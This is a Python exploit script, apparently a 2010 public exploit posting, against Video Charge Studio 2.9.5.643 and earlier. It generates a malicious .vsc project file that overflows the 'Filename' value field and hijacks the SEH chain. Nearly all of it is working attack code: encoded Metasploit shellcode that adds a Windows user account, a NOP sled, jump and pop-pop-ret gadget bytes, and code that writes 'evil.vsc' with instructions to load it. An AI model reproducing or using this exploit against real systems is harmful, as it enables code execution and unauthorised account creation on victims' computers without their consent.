#!/usr/bin/python
# Exploit Title: Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
# Date: 12/05/2010
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe
# Version: <= 2.9.5.643 (Latest)
# Tested on: Windows XP SP3 (Physical machine)
# CVE: N/A

### Software Description: ###
# Videocharge Studio is a video editing software which is intended for those users who
# regularly work with video, create Internet video galleries, convert video files.
# Videocharge Studio includes all features for video editing: video converting, splitting
# video into parts, joining several video files into a single one, adding watermark on
# video or image (add logo to video or photo), embedding image into video file, creating
# video from several images, editing audio. Videocharge Studio can edit video without
# reencoding as well.

### Exploit information: ###
# Video Charge Studio is prone to a buffer overflow when parsing a malicious vsc files
# "Filename" value field.
# An attacker could trick a user into loading a specially crafted vsc file to execute
# arbitrary code on a users PC without there consent.

### Shouts: ###
# kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity
# Have fun!

# "When you know that you're capable of dealing with whatever comes, you have the only
# security the world has to offer."					-Harry Browne

import struct
import sys

about = "=================================================\n"
about +=  " Video Charge Studio <= 2.9.5.643 (.vsc) BoF (SEH)\n"
about +=  " Author: xsploited security\n URL: http://www.x-sploited.com/\n"
about +=  " Contact: xsploitedsecurity [at] gmail.com\n"
about +=  "=================================================\n"
print about

# msfpayload windows/adduser user=xsploited pass=sec  EXITFUNC=seh
# R | msfencode -e x86/fnstenv_mov -c 1 -t perl -b '\x00\x09\x0a
# \x0d\x3e\x3c\x26\x20\x21\x22\x23\x2a\x07' > /tmp/encoded.txt
# [*] x86/fnstenv_mov succeeded with size 302 (iteration=1)

shellcode = (
"\x6a\x46\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
"\xcf\xb0\x91\x83\xeb\xfc\xe2\xf4\x32\x27\x39\x91\xce\xcf"
"\xd0\x18\x2b\xfe\x62\xf5\x45\x9d\x80\x1a\x9c\xc3\x3b\xc3"
"\xda\x44\xc2\xb9\xc1\x78\xfa\xb7\xff\x30\x81\x51\x62\xf3"
"\xd1\xed\xcc\xe3\x90\x50\x01\xc2\xb1\x56\x2c\x3f\xe2\xc6"
"\x45\x9d\xa0\x1a\x8c\xf3\xb1\x41\x45\x8f\xc8\x14\x0e\xbb"
"\xfa\x90\x1e\x9f\x3b\xd9\xd6\x44\xe8\xb1\xcf\x1c\x53\xad"
"\x87\x44\x84\x1a\xcf\x19\x81\x6e\xff\x0f\x1c\x50\x01\xc2"
"\xb1\x56\xf6\x2f\xc5\x65\xcd\xb2\x48\xaa\xb3\xeb\xc5\x73"
"\x96\x44\xe8\xb5\xcf\x1c\xd6\x1a\xc2\x84\x3b\xc9\xd2\xce"
"\x63\x1a\xca\x44\xb1\x41\x47\x8b\x94\xb5\x95\x94\xd1\xc8"
"\x94\x9e\x4f\x71\x96\x90\xea\x1a\xdc\x24\x36\xcc\xa4\xce"
"\x3d\x14\x77\xcf\xb0\x91\x9e\xa7\x81\x1a\xa1\x48\x4f\x44"
"\x75\x31\xbe\xa3\x24\xa7\x16\x04\x73\x52\x4f\x44\xf2\xc9"
"\xcc\x9b\x4e\x34\x50\xe4\xcb\x74\xf7\x82\xbc\xa0\xda\x91"
"\x9d\x30\x65\xf2\xa3\xab\x9e\xf4\xb6\xaa\x90\xbe\xad\xef"
"\xde\xf4\xba\xef\xc5\xe2\xab\xbd\x90\xe9\xbd\xbf\xdc\xfe"
"\xa7\xbb\xd5\xf5\xee\xbc\xd5\xf2\xee\xe0\xf1\xd5\x8a\xef"
"\x96\xb7\xee\xa1\xd5\xe5\xee\xa3\xdf\xf2\xaf\xa3\xd7\xe3"
"\xa1\xba\xc0\xb1\x8f\xab\xdd\xf8\xa0\xa6\xc3\xe5\xbc\xae"
"\xc4\xfe\xbc\xbc\x90\xe9\xbd\xbf\xdc\xfe\xa7\xbb\xd5\xf5"
"\xee\xe0\xf1\xd5\x8a\xcf\xba\x91"
);

header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30"
"\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69\x6e\x64\x6f\x77\x73\x2d"
"\x31\x32\x35\x32\x22\x20\x3f\x3e\x3c\x63\x6f\x6e\x66\x69\x67\x20\x76\x65\x72\x3d"
"\x22\x32\x2e\x39\x2e\x35\x2e\x36\x34\x33\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20"
"\x6e\x61\x6d\x65\x3d\x22\x46\x69\x6c\x65\x73\x22\x2f\x3e\x0d\x0a\x3c\x63\x6f\x6c"
"\x73\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66\x69\x6c\x65\x73\x22\x3e\x0d\x0a"
"\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66"
"\x69\x6c\x65\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20\x6e\x61\x6d\x65\x3d\x22\x46"
"\x6f\x72\x6d\x61\x74\x73\x22\x3e\x0d\x0a\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20"
"\x6e\x61\x6d\x65\x3d\x22\x46\x6f\x72\x6d\x61\x74\x22\x3e\x0d\x0a\x3c\x56\x61\x6c"
"\x75\x65\x20\x6e\x61\x6d\x65\x3d\x22\x4e\x61\x6d\x65\x22\x20\x74\x79\x70\x65\x3d"
"\x22\x38\x22\x20\x76\x61\x6c\x75\x65\x3d\x22"
);

footer = (
"\x22\x2f\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d\x0a"
"\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d"
"\x0a\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x63\x6f\x6e\x66\x69\x67\x3e"
);

size = 824; #824 junk bytes triggers the bof

payload = "\x90" * (size - len(shellcode));
payload += shellcode

payload += "\xEB\x06\x90\x90"; #jmp short
payload += struct.pack("<L",0x61B8451C); #universal p/p/r - zlib1.dll (Apps path)
payload += "\xe9\xe0\xfc\xff\xff"; #jmp back 800 bytes

xsploit = header + payload  + footer;

print("[*] Creating .vsc file");
print "[*] Payload size = " + str(len(payload)) + " bytes";

try:
	out_file = open("evil.vsc",'w');
	out_file.write(xsploit);
	out_file.close();
	print("[*] Malicious vsc file created successfully");
	print("[*] Launch Video Charge Studio and load the file\n[*] Exiting...\r\n");
except:
	print "[!] Error creating file";